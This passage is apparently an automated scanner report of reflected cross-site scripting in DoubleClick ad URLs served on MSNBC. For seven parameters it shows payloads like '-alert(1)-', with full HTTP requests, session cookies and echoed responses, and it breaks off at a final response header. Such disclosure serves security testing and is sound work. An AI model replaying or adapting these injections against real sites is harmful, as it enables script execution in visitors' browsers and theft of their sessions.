document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616354da'-alert(1)-'5924229b624&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f56ab"-alert(1)-"142e0c6b3d9 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616f56ab"-alert(1)-"142e0c6b3d9&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:12:00 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:12:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... ar minV = 6; var FWH = ' width="300" height="105" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616f56ab"-alert(1)-"142e0c6b3d9&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d9e5'-alert(1)-'012306d0300 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106376d9e5'-alert(1)-'012306d0300&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:12:36 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:12:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... rget=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106376d9e5'-alert(1)-'012306d0300&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8be26"-alert(1)-"8859d5c8fb3 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106378be26"-alert(1)-"8859d5c8fb3&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:12:28 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:12:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... " '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d48106378be26"-alert(1)-"8859d5c8fb3&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/ ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48f6a'-alert(1)-'dc0d0d0b99c was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM448f6a'-alert(1)-'dc0d0d0b99c&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:12:16 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:12:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM448f6a'-alert(1)-'dc0d0d0b99c&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83a9"-alert(1)-"0a5f61e11f5 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4e83a9"-alert(1)-"0a5f61e11f5&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:12:10 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:12:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... 6; var FWH = ' width="300" height="105" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4e83a9"-alert(1)-"0a5f61e11f5&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b412'-alert(1)-'da64d3f3254 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=212410659b412'-alert(1)-'da64d3f3254&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:56 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=212410659b412'-alert(1)-'da64d3f3254&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/ ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f178a"-alert(1)-"4c9e8c1a947 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065f178a"-alert(1)-"4c9e8c1a947&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:52 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... 0x105.gif"; var minV = 6; var FWH = ' width="300" height="105" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065f178a"-alert(1)-"4c9e8c1a947&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3968c'-alert(1)-'1506c597196 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G3968c'-alert(1)-'1506c597196&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:47 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G3968c'-alert(1)-'1506c597196&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f338"-alert(1)-"a50b7643689 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G5f338"-alert(1)-"a50b7643689&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:43 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... flo_interactive_300x105.gif"; var minV = 6; var FWH = ' width="300" height="105" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G5f338"-alert(1)-"a50b7643689&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8037'-alert(1)-'eebfd7f9b8f was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e8037'-alert(1)-'eebfd7f9b8f HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5266 Cache-Control: no-cache Pragma: no-cache Date: Tue, 22 Mar 2011 21:12:49 GMT Expires: Tue, 22 Mar 2011 21:12:49 GMT
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... \" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e8037'-alert(1)-'eebfd7f9b8fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx? ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7c4f"-alert(1)-"5711941fc4a was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e7c4f"-alert(1)-"5711941fc4a HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5266 Cache-Control: no-cache Pragma: no-cache Date: Tue, 22 Mar 2011 21:12:42 GMT Expires: Tue, 22 Mar 2011 21:12:42 GMT
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e7c4f"-alert(1)-"5711941fc4ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx? ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89d06"-alert(1)-"0e46aef3005 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!89d06"-alert(1)-"0e46aef3005&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:26 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... meyourprice_slider_flo_interactive_300x105.gif"; var minV = 6; var FWH = ' width="300" height="105" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!89d06"-alert(1)-"0e46aef3005&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e16a'-alert(1)-'93e31e9e62d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!8e16a'-alert(1)-'93e31e9e62d&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.msnbc.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
